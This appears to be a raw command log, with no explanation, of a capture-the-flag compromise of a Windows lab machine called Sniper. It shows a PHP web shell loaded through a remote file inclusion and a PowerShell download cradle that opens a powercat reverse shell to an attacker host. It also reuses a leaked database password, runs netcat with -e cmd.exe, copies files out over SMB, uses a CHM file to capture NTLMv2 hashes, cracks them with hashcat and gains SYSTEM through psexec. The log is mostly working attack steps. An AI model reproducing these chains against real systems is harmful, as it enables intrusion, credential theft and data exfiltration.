nmap -sC -sV -T4 -A -Pn -p- --open 10.10.10.151
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-21 02:34 EST
Stats: 0:02:29 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 97.71% done; ETC: 02:36 (0:00:00 remaining)
Nmap scan report for 10.10.10.151
Host is up (0.021s latency).
Not shown: 65530 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Sniper Co.
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
49667/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (89%)
Aggressive OS guesses: Microsoft Windows Server 2019 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
 
Host script results:
| smb2-time: 
|   date: 2024-11-21T14:36:42
|_  start_date: N/A
|_clock-skew: 6h59m59s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
 
TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   21.06 ms 10.10.14.1
2   21.11 ms 10.10.10.151
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 187.20 seconds
 

80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Sniper Co.

echo "<?php system(\$_GET['cmd']);?>" > shell.php

sudo impacket-smbserver share -smb2support ./

GET /blog/?lang=\\10.10.14.4\share\shell.php&cmd=whoami HTTP/1.1

python3 -m http.server 80

nc -lnvp 443

GET /blog/?lang=\\10.10.14.4\share\shell.php&cmd=powershell.exe+IEX+(New-Object+System.Net.Webclient).DownloadString('http%3a//10.10.14.4/powercat.ps1')%3bpowercat+-c+10.10.14.4+-p+443+-e+cmd HTTP/1.1

 nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.151] 49697
Microsoft Windows [Version 10.0.17763.678]
(c) 2018 Microsoft Corporation. All rights reserved.
 
C:\inetpub\wwwroot\blog>whoami
whoami
nt authority\iusr

C:\Users>systmeinfo
systmeinfo
 
'systmeinfo' is not recognized as an internal or external command,
operable program or batch file.
C:\Users>systeminfo
systeminfo
 
Host Name:                 SNIPER
OS Name:                   Microsoft Windows Server 2019 Standard
OS Version:                10.0.17763 N/A Build 17763
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00429-00521-62775-AA487
Original Install Date:     4/9/2019, 5:46:32 AM
System Boot Time:          11/24/2024, 3:49:56 AM
System Manufacturer:       VMware, Inc.
System Model:              VMware7,1
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2445 Mhz
                           [02]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2445 Mhz
BIOS Version:              VMware, Inc. VMW71.00V.23553139.B64.2403260936, 3/26/2024
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume3
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory:     6,143 MB
Available Physical Memory: 3,972 MB
Virtual Memory: Max Size:  7,807 MB
Virtual Memory: Available: 5,648 MB
Virtual Memory: In Use:    2,159 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Ethernet0 2
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.151
                                 [02]: fe80::c880:1a2b:1ad3:f29a
                                 [03]: dead:beef::c880:1a2b:1ad3:f29a
                                 [04]: dead:beef::157
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

PS C:\inetpub\wwwroot\user> cat db.php
cat db.php
<?php
// Enter your Host, username, password, database below.
// I left password empty because i do not set password on localhost.
$con = mysqli_connect("localhost","dbuser","36mEAhz/B8xQ~2VM","sniper");
// Check connection
if (mysqli_connect_errno())
  {
  echo "Failed to connect to MySQL: " . mysqli_connect_error();
  }
?>

nxc smb 10.10.10.151 -u 'Chris' -p '36mEAhz/B8xQ~2VM'
SMB         10.10.10.151    445    SNIPER           [*] Windows 10 / Server 2019 Build 17763 x64 (name:SNIPER) (domain:Sniper) (signing:False) (SMBv1:False)
SMB         10.10.10.151    445    SNIPER           [+] Sniper\Chris:36mEAhz/B8xQ~2VM 

$password = convertto-securestring -AsPlainText -Force -String "36mEAhz/B8xQ~2VM";
 
$credential = new-object -typename System.Management.Automation.PSCredential -argumentlist "SNIPER\chris",$password;
 
Invoke-Command -ComputerName LOCALHOST -ScriptBlock { wget http://10.10.14.4/nc.exe -o C:\Users\chris\nc.exe } -credential $credential;
 
Invoke-Command -ComputerName LOCALHOST -ScriptBlock { C:\Users\chris\nc.exe -e cmd.exe 10.10.14.4 443} -credential $credential;

nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.151] 49721
Microsoft Windows [Version 10.0.17763.678]
(c) 2018 Microsoft Corporation. All rights reserved.
 
C:\Users\Chris\Documents>whoami
whoami
sniper\chris

C:\Users\Chris\Desktop>type user.txt
type user.txt
0f6225e5...

C:\Docs>type note.txt
type note.txt
Hi Chris,
	Your php skillz suck. Contact yamitenshi so that he teaches you how to use it and after that fix the website as there are a lot of bugs on it. And I hope that you've prepared the documentation for our new app. Drop it here when you're done with it.
 
Regards,
Sniper CEO.
 

C:\Docs>copy "php for dummies-trial.pdf" \\10.10.14.4\share\
copy "php for dummies-trial.pdf" \\10.10.14.4\share\
        1 file(s) copied.

certutil.exe -f -urlcache -split http://10.10.14.4/winPEASx64.exe winPEASx64.exe

C:\Users\Chris\Downloads>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is AE98-73A8
 
 Directory of C:\Users\Chris\Downloads
 
04/11/2019  07:36 AM    <DIR>          .
04/11/2019  07:36 AM    <DIR>          ..
04/11/2019  07:36 AM            10,462 instructions.chm
               1 File(s)         10,462 bytes
               2 Dir(s)   2,294,296,576 bytes free

C:\Users\Chris\Downloads>copy instructions.chm \\10.10.14.4\share\
copy instructions.chm \\10.10.14.4\share\
        1 file(s) copied.

<html>
    <body>
        <img src=\\10.10.14.4\share\abc.png />
    </body>
</html>

certutil.exe -f -urlcache -split http://10.10.14.4/instructions.chm instructions.chm

sudo impacket-smbserver share -smb2support ./ 
Impacket v0.12.0.dev1+20240523.75507.15eff880 - Copyright 2023 Fortra
 
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.151,49728)
[*] AUTHENTICATE_MESSAGE (\,SNIPER)
[*] User SNIPER\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] Connecting Share(1:IPC$)
[*] Connecting Share(2:share)
[*] AUTHENTICATE_MESSAGE (SNIPER\Administrator,SNIPER)
[*] User SNIPER\Administrator authenticated successfully
[*] Administrator::SNIPER:aaaaaaaaaaaaaaaa:4cecbfcf...:010100000000000080642cd0523fdb01f13b9bf5d61f44c300000000010010007800560050004e0073005a0055004a00030010007800560050004e0073005a0055004a000200100064007100680046004c006f007a0077000400100064007100680046004c006f007a0077000700080080642cd0523fdb0106000400020000000800300030000000000000000000000000300000d79e2ac96f69a017ac3065dd98a687ed9e9ba557c302378cd914662a526fc42f0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310034002e003400000000000000000000000000
[*] AUTHENTICATE_MESSAGE (SNIPER\Administrator,SNIPER)
[*] User SNIPER\Administrator authenticated successfully
[*] Administrator::SNIPER:aaaaaaaaaaaaaaaa:c6c74e48...:010100000000000080642cd0523fdb01732a65f8d6436b4500000000010010007800560050004e0073005a0055004a00030010007800560050004e0073005a0055004a000200100064007100680046004c006f007a0077000400100064007100680046004c006f007a0077000700080080642cd0523fdb0106000400020000000800300030000000000000000000000000300000d79e2ac96f69a017ac3065dd98a687ed9e9ba557c302378cd914662a526fc42f0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310034002e003400000000000000000000000000

hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6-851-g6716447df) starting
 
OpenCL API (OpenCL 3.0 PoCL 5.0+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 16.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-penryn-13th Gen Intel(R) Core(TM) i9-13900HX, 5327/10718 MB (2048 MB allocatable), 6MCU
 
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
 
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
 
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
 
Watchdog: Temperature abort trigger set to 90c
 
Host memory required for this attack: 1 MB
 
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
 
ADMINISTRATOR::SNIPER:aaaaaaaaaaaaaaaa:c6c74e48...:010100000000000080642cd0523fdb01732a65f8d6436b4500000000010010007800560050004e0073005a0055004a00030010007800560050004e0073005a0055004a000200100064007100680046004c006f007a0077000400100064007100680046004c006f007a0077000700080080642cd0523fdb0106000400020000000800300030000000000000000000000000300000d79e2ac96f69a017ac3065dd98a687ed9e9ba557c302378cd914662a526fc42f0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310034002e003400000000000000000000000000:butterfly!#1

nxc smb 10.10.10.151 -u 'administrator' -p 'butterfly!#1'
SMB         10.10.10.151    445    SNIPER           [*] Windows 10 / Server 2019 Build 17763 x64 (name:SNIPER) (domain:Sniper) (signing:False) (SMBv1:False)
SMB         10.10.10.151    445    SNIPER           [+] Sniper\administrator:butterfly!#1 (Pwn3d!)

impacket-psexec administrator:'butterfly!#1'@10.10.10.151
Impacket v0.12.0.dev1+20240523.75507.15eff880 - Copyright 2023 Fortra
 
[*] Requesting shares on 10.10.10.151.....
[*] Found writable share ADMIN$
[*] Uploading file NGTyiUjV.exe
[*] Opening SVCManager on 10.10.10.151.....
[*] Creating service hTOo on 10.10.10.151.....
[*] Starting service hTOo.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.678]
(c) 2018 Microsoft Corporation. All rights reserved.
 
C:\Windows\system32> whoami
nt authority\system

C:\Users\Administrator\Desktop> type root.txt
b1655784...